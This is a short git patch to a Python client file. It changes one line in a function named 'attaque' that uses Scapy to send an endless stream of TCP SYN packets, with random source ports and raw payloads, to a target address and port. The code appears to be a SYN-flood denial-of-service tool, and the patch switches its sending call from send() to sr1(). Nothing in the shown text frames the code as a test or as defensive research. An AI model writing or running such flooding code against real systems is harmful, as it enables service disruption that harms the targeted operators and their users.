From 5b0309a4e803122d83176e935711558b0f1b3487 Mon Sep 17 00:00:00 2001 From: vSpaike <153102900+vSpaike@users.noreply.github.com> Date: Tue, 14 Jan 2025 12:11:17 +0100 Subject: [PATCH] send -> sr --- client/main.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/main.py b/client/main.py index e81e880..caca6f5 100644 --- a/client/main.py +++ b/client/main.py @@ -20,7 +20,7 @@ def attaque(): while True: requete = L[r.randint(0, 2)] paquet = IP(dst=adresse) / TCP(dport=port, sport=RandShort(), flags="S") / Raw(load=requete) - send(paquet, verbose=True) + sr1(paquet, verbose=True) if __name__ == "__main__": attaque()